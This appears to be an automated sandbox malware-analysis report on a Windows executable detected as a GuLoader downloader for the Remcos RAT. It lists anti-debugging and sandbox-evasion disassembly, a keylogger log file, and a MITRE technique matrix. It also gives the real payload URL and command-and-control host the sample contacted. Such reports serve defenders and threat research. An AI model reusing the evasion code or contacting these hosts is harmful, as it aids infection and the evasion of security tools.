Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567DF9 second address: 0000000000567DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0E656E2h 0x0000002e popad 0x0000002f call 00007FB8B0E65261h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056326F second address: 00000000005632FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [edi+00000814h], esi 0x00000009 mov esi, dword ptr [ebp+00000277h] 0x0000000f je 00007FB8B03663A8h 0x00000015 mov dword ptr [ebp+000001C9h], eax 0x0000001b mov eax, ecx 0x0000001d push eax 0x0000001e mov eax, dword ptr [ebp+000001C9h] 0x00000024 mov esi, dword ptr [edi+00000814h] 0x0000002a mov eax, dword ptr [edi+00000800h] 0x00000030 add eax, esi 0x00000032 add eax, ecx 0x00000034 test dh, dh 0x00000036 mov dword ptr [ebp+000001A6h], eax 0x0000003c mov eax, EC4E9022h 0x00000041 xor eax, 74E0F7A3h 0x00000046 xor eax, 4B60BED9h 0x0000004b sub eax, D3CED944h 0x00000050 cmp bh, 00000033h 0x00000053 push eax 0x00000054 mov eax, dword ptr [ebp+000001A6h] 0x0000005a mov dword ptr [ebp+0000018Fh], edx 0x00000060 mov edx, eax 0x00000062 push edx 0x00000063 mov edx, dword ptr [ebp+0000018Fh] 0x00000069 cmp ah, ch 0x0000006b mov ebx, edi 0x0000006d add ebx, 00000C00h 0x00000073 mov dword ptr [ebp+00000273h], ecx 0x00000079 mov ecx, ebx 0x0000007b cmp dl, al 0x0000007d push ecx 0x0000007e mov ecx, dword ptr [ebp+00000273h] 0x00000084 cmp dh, FFFFFFD7h 0x00000087 pushad 0x00000088 lfence 0x0000008b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: threadDelayed 9165
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: foregroundWindowGot 557

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep count: 9165 > 30
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep time: -45825s >= -30000s

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Thread sleep count: Count: 9165 delay: -5

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWu
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH0

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F6568 LdrInitializeThunk,

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F73B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3441 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5589 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7898 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Managerc
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp, logs.dat.11.dr	Binary or memory string: [ Program Manager ]
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\z
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\q
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\,

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery621	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery32	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kGSHiWbgq9.exe	22%	Virustotal		Browse
kGSHiWbgq9.exe	9%	ReversingLabs	Win32.Trojan.Vebzenpak
kGSHiWbgq9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUu	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457930
Start date:	02.08.2021
Start time:	15:15:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 29s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	kGSHiWbgq9.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 6.3% (good quality ratio 2.7%) Quality average: 21.2% Quality standard deviation: 28.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 40.88.32.150, 204.79.197.222, 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 40.126.31.142, 40.126.31.138, 40.126.31.3, 40.126.31.140, 20.190.159.133, 40.126.31.5, 40.126.31.7, 20.190.159.131, 51.104.136.2, 51.11.168.232 Excluded domains from analysis (whitelisted): fp.msedge.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158
	Document.1-xml.eml.exe	Get hash	malicious	Browse	194.5.98.136
	2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exe	Get hash	malicious	Browse	194.5.98.212
	ynFBVCYIcu.exe	Get hash	malicious	Browse	194.5.98.195
	#RFQ ORDER7678432213211.exe	Get hash	malicious	Browse	194.5.98.120

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\kGSHiWbgq9.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3487110381392666
Encrypted:	false
SSDEEP:	3:rklKlmvNBlfOlTfab5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIL8Rab5YcIeeDAlybW/G
MD5:	76573E45A0665F7B4EA43FCFAC539A41
SHA1:	4DD46EEC1D9DC9E981C0D4CF4248B1E98D1BFD90
SHA-256:	386A19E3AA88261E634D5DCBCD189211762BDCBB6C33ED74E67B259F1214748E
SHA-512:	2D21A84DC0D0AF7C315A6A616A6CD5D53EC99F6FA8259408101169D995642B258976259B70B363591F8FEB65E107E75DA8D2FA6D84E0EFC23FEA3D8856BEBBBA
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.2. .1.5.:.1.6.:.5.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.650522833717378
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kGSHiWbgq9.exe
File size:	114688
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
SHA512:	c2bcd733a0bfd1b9e56b630e4fae6a45951a843946a389f8987c48a3b047ca9b9f74a5a01afc7d7589f156691220e474553229f485b6de4f902db566a6a0d245
SSDEEP:	1536:EAPGkc1ug6GUMu+Yg2WGI5XZ4QmiPYefCGk4H:X2bUMEWfXZiea
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.................@..........D........P....@................

File Icon


Icon Hash:	a5b595a595a5a5b5

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4B801CC3 [Sat Feb 20 17:32:51 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B54h
call 00007FB8B0E0BDD5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx-2D91E317h], bh
sub eax, dword ptr [edx+312E8C4Dh]
cmp dword ptr [ecx+00414DE0h], edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+4Fh], al
inc ebx
dec ebx
dec esi
inc ebp
pop ecx
inc ebp
push edx
dec esi
inc ebp
push ebx
add byte ptr [ebp+73h], ch
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
mov ebp, 63A526FFh
pushfd
inc edi
test byte ptr [eax], ah
arpl word ptr [edi-5FF889ACh], si
adc eax, B00EF4E9h
sbb edi, ecx
inc ebx
movsd
cmp byte ptr [esi], bl
insd
pop ecx
test byte ptr [eax-52B0C5E4h], 00000033h
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ecx
add byte ptr [eax], al
cmp byte ptr [eax+00h], bl
add byte ptr [eax], al
or eax, dword ptr [eax]
push edx
inc ebp
push esp
dec ecx
dec esi
dec ecx
push ebx
push eax
dec edi
push edx
inc ecx
add byte ptr [53000F01h], cl
push esp
inc ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b96	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13df4	0x14000	False	0.649157714844	data	7.07266809617	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b96	0x6000	False	0.545694986979	data	6.03179178254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcee	0xea8	data
RT_ICON	0x1b446	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 1334943657, next used block 1336905122
RT_ICON	0x1aede	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x18936	0x25a8	data
RT_ICON	0x1788e	0x10a8	data
RT_ICON	0x17426	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173cc	0x5a	data
RT_VERSION	0x171e0	0x1ec	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	PAAKLDENDE
FileVersion	1.00
OriginalFilename	PAAKLDENDE.exe
ProductName	CAMPHOUR

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 15:17:47.154978991 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.206289053 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.206465006 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.258721113 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.258838892 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311050892 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311081886 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311098099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311132908 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311139107 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311167002 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311192036 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362611055 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362638950 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362657070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362673998 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362695932 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362715006 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362715006 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362735033 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362737894 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362752914 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362787008 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414144039 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414241076 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414274931 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414307117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414343119 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414372921 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414402008 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414433002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414464951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414465904 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414496899 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414524078 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414535999 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414570093 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414591074 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414603949 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414633036 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414633989 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414664030 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414683104 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414696932 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414722919 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414853096 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.466387987 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466418982 CEST	80	49758	101.99.94.119	192.168.2.4
